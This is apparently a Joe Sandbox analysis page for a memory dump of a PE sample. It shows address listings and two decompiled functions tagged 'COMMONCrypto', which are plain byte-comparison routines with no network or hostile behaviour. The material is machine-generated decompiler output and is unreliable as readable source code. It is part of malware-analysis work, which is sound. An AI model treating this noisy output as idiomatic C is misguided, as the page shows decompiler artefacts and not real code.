0x004304bd
0x00000000
0x00000000
0x00000000
0x004304bd
0x00430425
0x00430427
0x0043043c
0x00430444
0x00430446
0x0043045b
0x00430463
0x00430465
0x0043047a
0x00430482
0x00430484
0x0043048d
0x0043048d
0x0043048d
0x00000000
0x00430484
0x0043046e
0x0043046e
0x00430474
0x00000000
0x00000000
0x00000000
0x00430474
0x0043044f
0x0043044f
0x00430455
0x00000000
0x00000000
0x00000000
0x00430455
0x00430430
0x00430430
0x00430436
0x00000000
0x00000000
0x00000000
0x00430436
0x0043039e
0x004303a0
0x004303b5
0x004303bd
0x004303bf
0x004303d4
0x004303dc
0x004303de
0x004303f3
0x004303fb
0x004303fd
0x00430406
0x00430406
0x00430406
0x00000000
0x004303fd
0x004303e7
0x004303e7
0x004303ed
0x00000000
0x00000000
0x00000000
0x004303ed
0x004303c8
0x004303c8
0x004303ce
0x00000000
0x00000000
0x00000000
0x004303ce
0x004303a9
0x004303a9
0x004303af
0x00000000
0x00000000
0x00000000
0x00430310
0x00430310
0x00430313
0x00430317
0x00430319
0x0043032e
0x0043032e
0x00430332
0x00430336
0x00430338
0x0043034d
0x0043034d
0x00430351
0x00430355
0x00430357
0x0043036c
0x0043036c
0x00430370
0x00430374
0x00430376
0x00430378
0x0043037f
0x0043037f
0x0043037f
0x00000000
0x00430376
0x00430359
0x0043035d
0x00430360
0x00430360
0x00430366
0x00000000
0x00000000
0x00000000
0x00430366
0x0043033a
0x0043033e
0x00430341
0x00430341
0x00430347
0x00000000
0x00000000
0x00000000
0x00430347
0x0043031b
0x0043031f
0x00430322
0x00430322
0x00430328
0x00000000
0x00000000
0x00000000
0x00430328
0x0042fb91
0x0042fb91
0x00000000

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
Instruction ID: 64c4d7a6680a82a4bba296eede5de3adfd69d1d1f985af42ae8860de7093999d
Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
Instruction Fuzzy Hash: 23C19573E1A5B2068735852D542823FEF626E91B4135FC3B2DCD03F68AC22A6D159AD8

Uniqueness

Uniqueness Score: -1.00%

Function 0042FF36 Relevance: .3, Instructions: 332
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0042FF36(void* __eax, void* __ecx) {
				void* _t183;
				signed int _t184;
				void* _t187;
				signed char _t192;
				signed char _t193;
				signed char _t194;
				signed char _t195;
				signed char _t197;
				signed int _t271;
				void* _t274;
				void* _t276;
				void* _t278;
				void* _t281;
				void* _t283;
				void* _t285;
				void* _t288;
				void* _t290;
				void* _t292;
				void* _t295;
				void* _t297;
				void* _t299;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t309;
				void* _t311;
				void* _t313;

				_t187 = __ecx;
				_t183 = __eax;
				if( *((intOrPtr*)(__eax - 0x1d)) ==  *((intOrPtr*)(__ecx - 0x1d))) {
					_t271 = 0;
					L12:
					if(_t271 != 0) {
						goto L1;
					}
					_t192 =  *(_t183 - 0x19);
					if(_t192 ==  *(_t187 - 0x19)) {
						_t271 = 0;
						L23:
						if(_t271 != 0) {
							goto L1;
						}
						_t193 =  *(_t183 - 0x15);
						if(_t193 ==  *(_t187 - 0x15)) {
							_t271 = 0;
							L34:
							if(_t271 != 0) {
								goto L1;
							}
							_t194 =  *(_t183 - 0x11);
							if(_t194 ==  *(_t187 - 0x11)) {
								_t271 = 0;
								L45:
								if(_t271 != 0) {
									goto L1;
								}
								_t195 =  *(_t183 - 0xd);
								if(_t195 ==  *(_t187 - 0xd)) {
									_t271 = 0;
									L56:
									if(_t271 != 0) {
										goto L1;
									}
									if( *(_t183 - 9) ==  *(_t187 - 9)) {
										_t271 = 0;
										L67:
										if(_t271 != 0) {
											goto L1;
										}
										_t197 =  *(_t183 - 5);
										if(_t197 ==  *(_t187 - 5)) {
											_t271 = 0;
											L78:
											if(_t271 != 0) {
												goto L1;
											}
											_t184 = ( *(_t183 - 1) & 0x000000ff) - ( *(_t187 - 1) & 0x000000ff);
											if(_t184 != 0) {
												_t182 = (0 | _t184 > 0x00000000) - 1; // -1
												_t184 = (_t184 > 0) + _t182;
											}
											L2:
											return _t184;
										}
										_t274 = (_t197 & 0x000000ff) - ( *(_t187 - 5) & 0x000000ff);
										if(_t274 == 0) {
											L71:
											_t276 = ( *(_t183 - 4) & 0x000000ff) - ( *(_t187 - 4) & 0x000000ff);
											if(_t276 == 0) {
												L73:
												_t278 = ( *(_t183 - 3) & 0x000000ff) - ( *(_t187 - 3) & 0x000000ff);
												if(_t278 == 0) {
													L75:
													_t271 = ( *(_t183 - 2) & 0x000000ff) - ( *(_t187 - 2) & 0x000000ff);
													if(_t271 != 0) {
														_t176 = (0 | _t271 > 0x00000000) - 1; // -1
														_t271 = (_t271 > 0) + _t176;
													}
													goto L78;
												}
												_t170 = (0 | _t278 > 0x00000000) - 1; // -1
												_t271 = (_t278 > 0) + _t170;
												if(_t271 != 0) {
													goto L1;
												}
												goto L75;
											}
											_t164 = (0 | _t276 > 0x00000000) - 1; // -1
											_t271 = (_t276 > 0) + _t164;
											if(_t271 != 0) {
												goto L1;
											}
											goto L73;
										}
										_t158 = (0 | _t274 > 0x00000000) - 1; // -1
										_t271 = (_t274 > 0) + _t158;
										if(_t271 != 0) {
											goto L1;
										}
										goto L71;
									}
									_t281 = ( *(_t183 - 9) & 0x000000ff) - ( *(_t187 - 9) & 0x000000ff);
									if(_t281 == 0) {
										L60:
										_t283 = ( *(_t183 - 8) & 0x000000ff) - ( *(_t187 - 8) & 0x000000ff);
										if(_t283 == 0) {
											L62:
											_t285 = ( *(_t183 - 7) & 0x000000ff) - ( *(_t187 - 7) & 0x000000ff);
											if(_t285 == 0) {
												L64:
												_t271 = ( *(_t183 - 6) & 0x000000ff) - ( *(_t187 - 6) & 0x000000ff);
												if(_t271 != 0) {
													_t151 = (0 | _t271 > 0x00000000) - 1; // -1
													_t271 = (_t271 > 0) + _t151;
												}
												goto L67;
											}
											_t145 = (0 | _t285 > 0x00000000) - 1; // -1
											_t271 = (_t285 > 0) + _t145;
											if(_t271 != 0) {
												goto L1;
											}
											goto L64;
										}
										_t139 = (0 | _t283 > 0x00000000) - 1; // -1
										_t271 = (_t283 > 0) + _t139;
										if(_t271 != 0) {
											goto L1;
										}
										goto L62;
									}
									_t133 = (0 | _t281 > 0x00000000) - 1; // -1
									_t271 = (_t281 > 0) + _t133;
									if(_t271 != 0) {
										goto L1;
									}
									goto L60;
								}
								_t288 = (_t195 & 0x000000ff) - ( *(_t187 - 0xd) & 0x000000ff);
								if(_t288 == 0) {
									L49:
									_t290 = ( *(_t183 - 0xc) & 0x000000ff) - ( *(_t187 - 0xc) & 0x000000ff);
									if(_t290 == 0) {
										L51:
										_t292 = ( *(_t183 - 0xb) & 0x000000ff) - ( *(_t187 - 0xb) & 0x000000ff);
										if(_t292 == 0) {
											L53:
											_t271 = ( *(_t183 - 0xa) & 0x000000ff) - ( *(_t187 - 0xa) & 0x000000ff);
											if(_t271 != 0) {
												_t125 = (0 | _t271 > 0x00000000) - 1; // -1
												_t271 = (_t271 > 0) + _t125;
											}
											goto L56;
										}
										_t119 = (0 | _t292 > 0x00000000) - 1; // -1
										_t271 = (_t292 > 0) + _t119;
										if(_t271 != 0) {
											goto L1;
										}
										goto L53;
									}
									_t113 = (0 | _t290 > 0x00000000) - 1; // -1
									_t271 = (_t290 > 0) + _t113;
									if(_t271 != 0) {
										goto L1;
									}
									goto L51;
								}
								_t107 = (0 | _t288 > 0x00000000) - 1; // -1
								_t271 = (_t288 > 0) + _t107;
								if(_t271 != 0) {
									goto L1;
								}
								goto L49;
							}
							_t295 = (_t194 & 0x000000ff) - ( *(_t187 - 0x11) & 0x000000ff);
							if(_t295 == 0) {
								L38:
								_t297 = ( *(_t183 - 0x10) & 0x000000ff) - ( *(_t187 - 0x10) & 0x000000ff);
								if(_t297 == 0) {
									L40:
									_t299 = ( *(_t183 - 0xf) & 0x000000ff) - ( *(_t187 - 0xf) & 0x000000ff);
									if(_t299 == 0) {
										L42:
										_t271 = ( *(_t183 - 0xe) & 0x000000ff) - ( *(_t187 - 0xe) & 0x000000ff);
										if(_t271 != 0) {
											_t100 = (0 | _t271 > 0x00000000) - 1; // -1
											_t271 = (_t271 > 0) + _t100;
										}
										goto L45;
									}
									_t94 = (0 | _t299 > 0x00000000) - 1; // -1
									_t271 = (_t299 > 0) + _t94;
									if(_t271 != 0) {
										goto L1;
									}
									goto L42;
								}
								_t88 = (0 | _t297 > 0x00000000) - 1; // -1
								_t271 = (_t297 > 0) + _t88;
								if(_t271 != 0) {
									goto L1;
								}
								goto L40;
							}
							_t82 = (0 | _t295 > 0x00000000) - 1; // -1
							_t271 = (_t295 > 0) + _t82;
							if(_t271 != 0) {
								goto L1;
							}
							goto L38;
						}
						_t302 = (_t193 & 0x000000ff) - ( *(_t187 - 0x15) & 0x000000ff);
						if(_t302 == 0) {
							L27:
							_t304 = ( *(_t183 - 0x14) & 0x000000ff) - ( *(_t187 - 0x14) & 0x000000ff);
							if(_t304 == 0) {
								L29:
								_t306 = ( *(_t183 - 0x13) & 0x000000ff) - ( *(_t187 - 0x13) & 0x000000ff);
								if(_t306 == 0) {
									L31:
									_t271 = ( *(_t183 - 0x12) & 0x000000ff) - ( *(_t187 - 0x12) & 0x000000ff);
									if(_t271 != 0) {
										_t75 = (0 | _t271 > 0x00000000) - 1; // -1
										_t271 = (_t271 > 0) + _t75;
									}
									goto L34;
								}
								_t69 = (0 | _t306 > 0x00000000) - 1; // -1
								_t271 = (_t306 > 0) + _t69;
								if(_t271 != 0) {
									goto L1;
								}
								goto L31;
							}
							_t63 = (0 | _t304 > 0x00000000) - 1; // -1
							_t271 = (_t304 > 0) + _t63;
							if(_t271 != 0) {
								goto L1;
							}
							goto L29;
						}
						_t57 = (0 | _t302 > 0x00000000) - 1; // -1
						_t271 = (_t302 > 0) + _t57;
						if(_t271 != 0) {
							goto L1;
						}
						goto L27;
					}
					_t309 = (_t192 & 0x000000ff) - ( *(_t187 - 0x19) & 0x000000ff);
					if(_t309 == 0) {
						L16:
						_t311 = ( *(_t183 - 0x18) & 0x000000ff) - ( *(_t187 - 0x18) & 0x000000ff);
						if(_t311 == 0) {
							L18:
							_t313 = ( *(_t183 - 0x17) & 0x000000ff) - ( *(_t187 - 0x17) & 0x000000ff);
							if(_t313 == 0) {
								L20:
								_t271 = ( *(_t183 - 0x16) & 0x000000ff) - ( *(_t187 - 0x16) & 0x000000ff);
								if(_t271 != 0) {
									_t50 = (0 | _t271 > 0x00000000) - 1; // -1
									_t271 = (_t271 > 0) + _t50;
								}
								goto L23;
							}
							_t44 = (0 | _t313 > 0x00000000) - 1; // -1
							_t271 = (_t313 > 0) + _t44;
							if(_t271 != 0) {
								goto L1;
							}
							goto L20;
						}
						_t38 = (0 | _t311 > 0x00000000) - 1; // -1
						_t271 = (_t311 > 0) + _t38;
						if(_t271 != 0) {
							goto L1;
						}
						goto L18;
					}
					_t32 = (0 | _t309 > 0x00000000) - 1; // -1
					_t271 = (_t309 > 0) + _t32;
					if(_t271 != 0) {
						goto L1;
					}
					goto L16;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1d) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
					if(__esi == 0) {
						L5:
						__esi =  *(__eax - 0x1c) & 0x000000ff;
						__edx =  *(__ecx - 0x1c) & 0x000000ff;
						__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
						if(__esi == 0) {
							L7:
							__esi =  *(__eax - 0x1b) & 0x000000ff;
							__edx =  *(__ecx - 0x1b) & 0x000000ff;
							__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
							if(__esi == 0) {
								L9:
								__esi =  *(__eax - 0x1a) & 0x000000ff;
								__edx =  *(__ecx - 0x1a) & 0x000000ff;
								__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
								if(__esi != 0) {
									__edx = 0;
									_t25 = (0 | __esi > 0x00000000) - 1; // -1
									__esi = (__esi > 0) + _t25;
								}
								goto L12;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t19 = __edx - 1; // -1
							__esi = __edx + _t19;
							if(__edx + _t19 != 0) {
								goto L1;
							}
							goto L9;
						}
						__edx = 0;
						__edx = 0 | __esi > 0x00000000;
						_t13 = __edx - 1; // -1
						__esi = __edx + _t13;
						if(__edx + _t13 != 0) {
							goto L1;
						}
						goto L7;
					}
					__edx = 0;
					__edx = 0 | __esi > 0x00000000;
					_t7 = __edx - 1; // -1
					__esi = __edx + _t7;
					if(__edx + _t7 != 0) {
						goto L1;
					}
					goto L5;
				}
				L1:
				_t184 = _t271;
				goto L2;
			}

0x0042ff36
0x0042ff36
0x0042ff3c
0x0042ffb3
0x0042ffb5
0x0042ffb7
0x00000000
0x00000000
0x0042ffbd
0x0042ffc3
0x0043003a
0x0043003c
0x0043003e
0x00000000
0x00000000
0x00430044
0x0043004a
0x004300c1
0x004300c3
0x004300c5
0x00000000
0x00000000
0x004300cb
0x004300d1
0x00430148
0x0043014a
0x0043014c
0x00000000
0x00000000
0x00430152
0x00430158
0x004301cf
0x004301d1
0x004301d3
0x00000000
0x00000000
0x004301df
0x00430257
0x00430259
0x0043025b
0x00000000
0x00000000
0x00430261
0x00430267
0x004302de
0x004302e0
0x004302e2
0x00000000
0x00000000
0x004302f0
0x004302f2
0x004302ff
0x004302ff
0x004302ff
0x0042ff30
0x00430bd4
0x00430bd4
0x00430270
0x00430272
0x00430287
0x0043028f
0x00430291
0x004302a6
0x004302ae
0x004302b0
0x004302c5
0x004302cd
0x004302cf
0x004302d8
0x004302d8
0x004302d8
0x00000000
0x004302cf
0x004302b9
0x004302b9
0x004302bf
0x00000000
0x00000000
0x00000000
0x004302bf
0x0043029a
0x0043029a
0x004302a0
0x00000000
0x00000000
0x00000000
0x004302a0
0x0043027b
0x0043027b
0x00430281
0x00000000
0x00000000
0x00000000
0x00430281
0x004301e9
0x004301eb
0x00430200
0x00430208
0x0043020a
0x0043021f
0x00430227
0x00430229
0x0043023e
0x00430246
0x00430248
0x00430251
0x00430251
0x00430251
0x00000000
0x00430248
0x00430232
0x00430232
0x00430238
0x00000000
0x00000000
0x00000000
0x00430238
0x00430213
0x00430213
0x00430219
0x00000000
0x00000000
0x00000000
0x00430219
0x004301f4
0x004301f4
0x004301fa
0x00000000
0x00000000
0x00000000
0x004301fa
0x00430161
0x00430163
0x00430178
0x00430180
0x00430182
0x00430197
0x0043019f
0x004301a1
0x004301b6
0x004301be
0x004301c0
0x004301c9
0x004301c9
0x004301c9
0x00000000
0x004301c0
0x004301aa
0x004301aa
0x004301b0
0x00000000
0x00000000
0x00000000
0x004301b0
0x0043018b
0x0043018b
0x00430191
0x00000000
0x00000000
0x00000000
0x00430191
0x0043016c
0x0043016c
0x00430172
0x00000000
0x00000000
0x00000000
0x00430172
0x004300da
0x004300dc
0x004300f1
0x004300f9
0x004300fb
0x00430110
0x00430118
0x0043011a
0x0043012f
0x00430137
0x00430139
0x00430142
0x00430142
0x00430142
0x00000000
0x00430139
0x00430123
0x00430123
0x00430129
0x00000000
0x00000000
0x00000000
0x00430129
0x00430104
0x00430104
0x0043010a
0x00000000
0x00000000
0x00000000
0x0043010a
0x004300e5
0x004300e5
0x004300eb
0x00000000
0x00000000
0x00000000
0x004300eb
0x00430053
0x00430055
0x0043006a
0x00430072
0x00430074
0x00430089
0x00430091
0x00430093
0x004300a8
0x004300b0
0x004300b2
0x004300bb
0x004300bb
0x004300bb
0x00000000
0x004300b2
0x0043009c
0x0043009c
0x004300a2
0x00000000
0x00000000
0x00000000
0x004300a2
0x0043007d
0x0043007d
0x00430083
0x00000000
0x00000000
0x00000000
0x00430083
0x0043005e
0x0043005e
0x00430064
0x00000000
0x00000000
0x00000000
0x00430064
0x0042ffcc
0x0042ffce
0x0042ffe3
0x0042ffeb
0x0042ffed
0x00430002
0x0043000a
0x0043000c
0x00430021
0x00430029
0x0043002b
0x00430034
0x00430034
0x00430034
0x00000000
0x0043002b
0x00430015
0x00430015
0x0043001b
0x00000000
0x00000000
0x00000000
0x0043001b
0x0042fff6
0x0042fff6
0x0042fffc
0x00000000
0x00000000
0x00000000
0x0042fffc
0x0042ffd7
0x0042ffd7
0x0042ffdd
0x00000000
0x00000000
0x00000000
0x0042ff3e
0x0042ff3e
0x0042ff41
0x0042ff45
0x0042ff47
0x0042ff5c
0x0042ff5c
0x0042ff60
0x0042ff64
0x0042ff66
0x0042ff7b
0x0042ff7b
0x0042ff7f
0x0042ff83
0x0042ff85
0x0042ff9a
0x0042ff9a
0x0042ff9e
0x0042ffa2
0x0042ffa4
0x0042ffa6
0x0042ffad
0x0042ffad
0x0042ffad
0x00000000
0x0042ffa4
0x0042ff87
0x0042ff8b
0x0042ff8e
0x0042ff8e
0x0042ff94
0x00000000
0x00000000
0x00000000
0x0042ff94
0x0042ff68
0x0042ff6c
0x0042ff6f
0x0042ff6f
0x0042ff75
0x00000000
0x00000000
0x00000000
0x0042ff75
0x0042ff49
0x0042ff4d
0x0042ff50
0x0042ff50
0x0042ff56
0x00000000
0x00000000
0x00000000
0x0042ff56
0x0042fb91
0x0042fb91
0x00000000

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
Instruction ID: 5351ece81f806b538959af80d229956efc2b0a1670d653184c772df7fa1dcb23
Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
Instruction Fuzzy Hash: E2C18173E1A5B2098B36452D552823FEF716E91B4035FC3F6CCD03F68AC62A6D059AD8

Uniqueness

Uniqueness Score: -1.00%

Function 0042FB98 Relevance: .3, Instructions: 326
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0042FB98(void* __eax, void* __ecx) {
				void* _t177;
				signed int _t178;
				void* _t181;
				signed char _t186;
				signed char _t187;
				signed char _t188;
				signed char _t190;
				signed char _t191;
				signed int _t197;
				signed int _t263;
				void* _t266;
				void* _t268;
				void* _t270;
				void* _t272;
				void* _t274;
				void* _t276;
				void* _t279;
				void* _t281;
				void* _t283;
				void* _t286;
				void* _t288;
				void* _t290;
				void* _t293;
				void* _t295;
				void* _t297;
				void* _t300;
				void* _t302;
				void* _t304;

				_t181 = __ecx;
				_t177 = __eax;
				if( *((intOrPtr*)(__eax - 0x1c)) ==  *((intOrPtr*)(__ecx - 0x1c))) {
					_t263 = 0;
					L11:
					if(_t263 != 0) {
						goto L1;
					}
					_t186 =  *(_t177 - 0x18);
					if(_t186 ==  *(_t181 - 0x18)) {
						_t263 = 0;
						L22:
						if(_t263 != 0) {
							goto L1;
						}
						_t187 =  *(_t177 - 0x14);
						if(_t187 ==  *(_t181 - 0x14)) {
							_t263 = 0;
							L33:
							if(_t263 != 0) {
								goto L1;
							}
							_t188 =  *(_t177 - 0x10);
							if(_t188 ==  *(_t181 - 0x10)) {
								_t263 = 0;
								L44:
								if(_t263 != 0) {
									goto L1;
								}
								if( *(_t177 - 0xc) ==  *(_t181 - 0xc)) {
									_t263 = 0;
									L55:
									if(_t263 != 0) {
										goto L1;
									}
									_t190 =  *(_t177 - 8);
									if(_t190 ==  *(_t181 - 8)) {
										_t263 = 0;
										L66:
										if(_t263 != 0) {
											goto L1;
										}
										_t191 =  *(_t177 - 4);
										if(_t191 ==  *(_t181 - 4)) {
											_t178 = 0;
											L78:
											if(_t178 == 0) {
												_t178 = 0;
											}
											L80:
											return _t178;
										}
										_t266 = (_t191 & 0x000000ff) - ( *(_t181 - 4) & 0x000000ff);
										if(_t266 == 0) {
											L70:
											_t268 = ( *(_t177 - 3) & 0x000000ff) - ( *(_t181 - 3) & 0x000000ff);
											if(_t268 == 0) {
												L72:
												_t270 = ( *(_t177 - 2) & 0x000000ff) - ( *(_t181 - 2) & 0x000000ff);
												if(_t270 == 0) {
													L75:
													_t178 = ( *(_t177 - 1) & 0x000000ff) - ( *(_t181 - 1) & 0x000000ff);
													if(_t178 != 0) {
														_t176 = (0 | _t178 > 0x00000000) - 1; // -1
														_t178 = (_t178 > 0) + _t176;
													}
													goto L78;
												}
												_t197 = (0 | _t270 > 0x00000000) + (0 | _t270 > 0x00000000) - 1;
												if(_t197 == 0) {
													goto L75;
												}
												L74:
												_t178 = _t197;
												goto L78;
											}
											_t197 = (0 | _t268 > 0x00000000) + (0 | _t268 > 0x00000000) - 1;
											if(_t197 != 0) {
												goto L74;
											}
											goto L72;
										}
										_t197 = (0 | _t266 > 0x00000000) + (0 | _t266 > 0x00000000) - 1;
										if(_t197 != 0) {
											goto L74;
										}
										goto L70;
									}
									_t272 = (_t190 & 0x000000ff) - ( *(_t181 - 8) & 0x000000ff);
									if(_t272 == 0) {
										L59:
										_t274 = ( *(_t177 - 7) & 0x000000ff) - ( *(_t181 - 7) & 0x000000ff);
										if(_t274 == 0) {
											L61:
											_t276 = ( *(_t177 - 6) & 0x000000ff) - ( *(_t181 - 6) & 0x000000ff);
											if(_t276 == 0) {
												L63:
												_t263 = ( *(_t177 - 5) & 0x000000ff) - ( *(_t181 - 5) & 0x000000ff);
												if(_t263 != 0) {
													_t151 = (0 | _t263 > 0x00000000) - 1; // -1
													_t263 = (_t263 > 0) + _t151;
												}
												goto L66;
											}
											_t145 = (0 | _t276 > 0x00000000) - 1; // -1
											_t263 = (_t276 > 0) + _t145;
											if(_t263 != 0) {
												goto L1;
											}
											goto L63;
										}
										_t139 = (0 | _t274 > 0x00000000) - 1; // -1
										_t263 = (_t274 > 0) + _t139;
										if(_t263 != 0) {
											goto L1;
										}
										goto L61;
									}
									_t133 = (0 | _t272 > 0x00000000) - 1; // -1
									_t263 = (_t272 > 0) + _t133;
									if(_t263 != 0) {
										goto L1;
									}
									goto L59;
								}
								_t279 = ( *(_t177 - 0xc) & 0x000000ff) - ( *(_t181 - 0xc) & 0x000000ff);
								if(_t279 == 0) {
									L48:
									_t281 = ( *(_t177 - 0xb) & 0x000000ff) - ( *(_t181 - 0xb) & 0x000000ff);
									if(_t281 == 0) {
										L50:
										_t283 = ( *(_t177 - 0xa) & 0x000000ff) - ( *(_t181 - 0xa) & 0x000000ff);
										if(_t283 == 0) {
											L52:
											_t263 = ( *(_t177 - 9) & 0x000000ff) - ( *(_t181 - 9) & 0x000000ff);
											if(_t263 != 0) {
												_t126 = (0 | _t263 > 0x00000000) - 1; // -1
												_t263 = (_t263 > 0) + _t126;
											}
											goto L55;
										}
										_t120 = (0 | _t283 > 0x00000000) - 1; // -1
										_t263 = (_t283 > 0) + _t120;
										if(_t263 != 0) {
											goto L1;
										}
										goto L52;
									}
									_t114 = (0 | _t281 > 0x00000000) - 1; // -1
									_t263 = (_t281 > 0) + _t114;
									if(_t263 != 0) {
										goto L1;
									}
									goto L50;
								}
								_t108 = (0 | _t279 > 0x00000000) - 1; // -1
								_t263 = (_t279 > 0) + _t108;
								if(_t263 != 0) {
									goto L1;
								}
								goto L48;
							}
							_t286 = (_t188 & 0x000000ff) - ( *(_t181 - 0x10) & 0x000000ff);
							if(_t286 == 0) {
								L37:
								_t288 = ( *(_t177 - 0xf) & 0x000000ff) - ( *(_t181 - 0xf) & 0x000000ff);
								if(_t288 == 0) {
									L39:
									_t290 = ( *(_t177 - 0xe) & 0x000000ff) - ( *(_t181 - 0xe) & 0x000000ff);
									if(_t290 == 0) {
										L41:
										_t263 = ( *(_t177 - 0xd) & 0x000000ff) - ( *(_t181 - 0xd) & 0x000000ff);
										if(_t263 != 0) {
											_t100 = (0 | _t263 > 0x00000000) - 1; // -1
											_t263 = (_t263 > 0) + _t100;
										}
										goto L44;
									}
									_t94 = (0 | _t290 > 0x00000000) - 1; // -1
									_t263 = (_t290 > 0) + _t94;
									if(_t263 != 0) {
										goto L1;
									}
									goto L41;
								}
								_t88 = (0 | _t288 > 0x00000000) - 1; // -1
								_t263 = (_t288 > 0) + _t88;
								if(_t263 != 0) {
									goto L1;
								}
								goto L39;
							}
							_t82 = (0 | _t286 > 0x00000000) - 1; // -1
							_t263 = (_t286 > 0) + _t82;
							if(_t263 != 0) {
								goto L1;
							}
							goto L37;
						}
						_t293 = (_t187 & 0x000000ff) - ( *(_t181 - 0x14) & 0x000000ff);
						if(_t293 == 0) {
							L26:
							_t295 = ( *(_t177 - 0x13) & 0x000000ff) - ( *(_t181 - 0x13) & 0x000000ff);
							if(_t295 == 0) {
								L28:
								_t297 = ( *(_t177 - 0x12) & 0x000000ff) - ( *(_t181 - 0x12) & 0x000000ff);
								if(_t297 == 0) {
									L30:
									_t263 = ( *(_t177 - 0x11) & 0x000000ff) - ( *(_t181 - 0x11) & 0x000000ff);
									if(_t263 != 0) {
										_t75 = (0 | _t263 > 0x00000000) - 1; // -1
										_t263 = (_t263 > 0) + _t75;
									}
									goto L33;
								}
								_t69 = (0 | _t297 > 0x00000000) - 1; // -1
								_t263 = (_t297 > 0) + _t69;
								if(_t263 != 0) {
									goto L1;
								}
								goto L30;
							}
							_t63 = (0 | _t295 > 0x00000000) - 1; // -1
							_t263 = (_t295 > 0) + _t63;
							if(_t263 != 0) {
								goto L1;
							}
							goto L28;
						}
						_t57 = (0 | _t293 > 0x00000000) - 1; // -1
						_t263 = (_t293 > 0) + _t57;
						if(_t263 != 0) {
							goto L1;
						}
						goto L26;
					}
					_t300 = (_t186 & 0x000000ff) - ( *(_t181 - 0x18) & 0x000000ff);
					if(_t300 == 0) {
						L15:
						_t302 = ( *(_t177 - 0x17) & 0x000000ff) - ( *(_t181 - 0x17) & 0x000000ff);
						if(_t302 == 0) {
							L17:
							_t304 = ( *(_t177 - 0x16) & 0x000000ff) - ( *(_t181 - 0x16) & 0x000000ff);
							if(_t304 == 0) {
								L19:
								_t263 = ( *(_t177 - 0x15) & 0x000000ff) - ( *(_t181 - 0x15) & 0x000000ff);
								if(_t263 != 0) {
									_t50 = (0 | _t263 > 0x00000000) - 1; // -1
									_t263 = (_t263 > 0) + _t50;
								}
								goto L22;
							}
							_t44 = (0 | _t304 > 0x00000000) - 1; // -1
							_t263 = (_t304 > 0) + _t44;
							if(_t263 != 0) {
								goto L1;
							}
							goto L19;
						}
						_t38 = (0 | _t302 > 0x00000000) - 1; // -1
						_t263 = (_t302 > 0) + _t38;
						if(_t263 != 0) {
							goto L1;
						}
						goto L17;
					}
					_t32 = (0 | _t300 > 0x00000000) - 1; // -1
					_t263 = (_t300 > 0) + _t32;
					if(_t263 != 0) {
						goto L1;
					}
					goto L15;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1c) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
					if(__esi == 0) {
						L4:
						__esi =  *(__eax - 0x1b) & 0x000000ff;
						__edx =  *(__ecx - 0x1b) & 0x000000ff;
						__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
						if(__esi == 0) {
							L6:
							__esi =  *(__eax - 0x1a) & 0x000000ff;
							__edx =  *(__ecx - 0x1a) & 0x000000ff;
							__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
							if(__esi == 0) {
								L8:
								__esi =  *(__eax - 0x19) & 0x000000ff;
								__edx =  *(__ecx - 0x19) & 0x000000ff;
								__esi = ( *(__eax - 0x19) & 0x000000ff) - ( *(__ecx - 0x19) & 0x000000ff);
								if(__esi != 0) {
									__edx = 0;
									_t25 = (0 | __esi > 0x00000000) - 1; // -1
									__esi = (__esi > 0) + _t25;
								}
								goto L11;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t19 = __edx - 1; // -1
							__esi = __edx + _t19;
							if(__edx + _t19 != 0) {
								goto L1;
							}
							goto L8;
						}
						__edx = 0;
						__edx = 0 | __esi > 0x00000000;
						_t13 = __edx - 1; // -1
						__esi = __edx + _t13;
						if(__edx + _t13 != 0) {
							goto L1;
						}
						goto L6;
					}
					__edx = 0;
					__edx = 0 | __esi > 0x00000000;
					_t7 = __edx - 1; // -1
					__esi = __edx + _t7;
					if(__edx + _t7 != 0) {
						goto L1;
					}
					goto L4;
				}
				L1:
				_t178 = _t263;
				goto L80;
			}

